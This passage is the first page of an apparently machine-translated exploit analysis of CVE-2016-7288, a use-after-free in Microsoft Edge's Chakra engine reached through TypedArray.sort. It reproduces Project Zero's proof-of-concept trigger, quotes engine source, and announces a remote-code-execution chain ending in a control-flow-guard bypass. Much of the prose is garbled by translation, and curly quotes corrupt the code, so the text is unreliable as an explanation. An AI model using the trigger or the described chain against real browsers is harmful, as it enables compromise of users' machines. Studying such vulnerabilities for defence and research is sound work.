MS16-145: Edge browser the TypedArray. sort UAF vulnerability analysis-vulnerability warning-the black bar safety net

In this article, we will provide the reader detailed analysis of how to use the MS Edge browser in the UAF vulnerability to remote code execution.
This article will provide readers in-depth analysis of the impact of MS Edge CVE-2016-7288 UAF vulnerability root causes, and how to reliably trigger the UAF vulnerability, how to use a precise method to the left and right Quicksort thereby control the switching operation and destruction of the memory, to obtain the relative memory read/write primitives, and then in WebGL with the help of which is converted to an absolute R / W primitive, and finally the use of fake object-oriented programming COOP technology to bypass the control flow protection measures.
Analysis annotation
This article is in the Windows 10 Anniversary Update x64 using the following versions of MS Edge to perform the analysis work.
There is a security vulnerability module: chakra.dll 11.0.14393.0
Description
Google Project Zero has published this vulnerability and proof-of-concept[3], allegedly this is a JavaScript TypedArray. the sort method of the UAF vulnerability.
The following is posted on the Project Zero bug tracker in the original PoC of:
var buf = new ArrayBuffer( 0x10010);
var numbers = new Uint8Array(buf);
var first = 0;
function v(){
alert(“in v”);
if( first == 0){
postMessage(“test”, “http://127.0.0.1”, [buf])
first++;
}
return 7;
}
function compareNumbers(a, b) {
alert(“in func”);
return {valueOf : v};
}
try{
numbers. sort(compareNumbers);
}catch(e){
alert(e. message);
}
It is worth noting that in my testing process, the PoC simply does not trigger this vulnerability.
The vulnerability is the root cause
According to Mozilla on the TypedArray. the sort method of the document[4],“sort（）method for the type of the elements of the array to be sorted, and returns a typed array”is. This method has a named compareFunction an optional parameter, the parameter“specify custom sort order function.”
JavaScript TypedArray. the sort method of the corresponding native method is the chakra that! TypedArrayBase :: EntrySort, it is in the lib / Runtime / Library / TypedArray. cpp is defined.
Var TypedArrayBase::EntrySort(RecyclableObject* function, CallInfo callInfo, …){
[…]
// Get the elements comparison function for the type of this TypedArray
void* elementCompare = reinterpret_cast(typedArrayBase->GetCompareElementsFunction());
// Cast the compare to the correct function type
int(__cdeclelementCompareFunc)(void, const void*, const void*) = (int(__cdecl*)(void*, const void*, const void*))elementCompare;
void * contextToPass[] = { typedArrayBase, compareFn };
// We can always call qsort_s with the same arguments. If the user compareFn is non-null, the callback will use it to do the comparison.
qsort_s(typedArrayBase->GetByteBuffer(), length, typedArrayBase->GetBytesPerElement(), elementCompareFunc, contextToPass);
We can see that it calls GetCompareElementsFunction method to get the element comparison function, and performing a type conversion, the function will be passed to qsort_s（）[5]as its fourth parameter. According to its documentation:
qsort_s function implements a quick sort algorithm to sort an array of elements […] on. qsort_s will use the sorted elements to cover this array. Parameter compare is a pointer to user-supplied routines the pointer, it compares two array elements and returns a show of their relationship value. qsort_s in the ordering period will be called once or more times to the comparison routine, each call will pass pointers to two array elements.
Here is a description of the qsort_s all the details of our task are very important, this point will be described later in the article reflected.
GetCompareElementsFunction method is in lib / Runtime / Library / TypedArray. h is defined, it just returns TypedArrayCompareElementsHelper function of the address:
CompareElementsFunction GetCompareElementsFunction()
{
return &TypedArrayCompareElementsHelper;
}
A native comparison function TypedArrayCompareElementsHelper is in the TypedArray. cpp is defined, its code is as follows:
template int __cdecl TypedArrayCompareElementsHelper(void* context, const void* elem1, const void* elem2)
{
[…]
Var retVal = CALL_FUNCTION(compFn, CallInfo(CallFlags_Value, 3),
undefined,
JavascriptNumber::ToVarWithCheck((double)x, scriptContext),
JavascriptNumber::ToVarWithCheck((double)y, scriptContext));
Assert(TypedArrayBase::Is(contextArray[0]));
if (TypedArrayBase::IsDetachedTypedArray(contextArray[0]))
{
JavascriptError::ThrowTypeError(scriptContext, JSERR_DetachedTypedArray, _u(“[TypedArray]. prototype. sort”));
}
if (TaggedInt::Is(retVal))
{
return TaggedInt::ToInt32(retVal);
}
if (JavascriptNumber::Is_NoTaggedIntCheck(retVal))
{
dblResult = JavascriptNumber::GetValue(retVal);
}
else
{
dblResult = JavascriptConversion::ToNumber_Full(retVal, scriptContext);

[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [next] (<85933_2.htm>)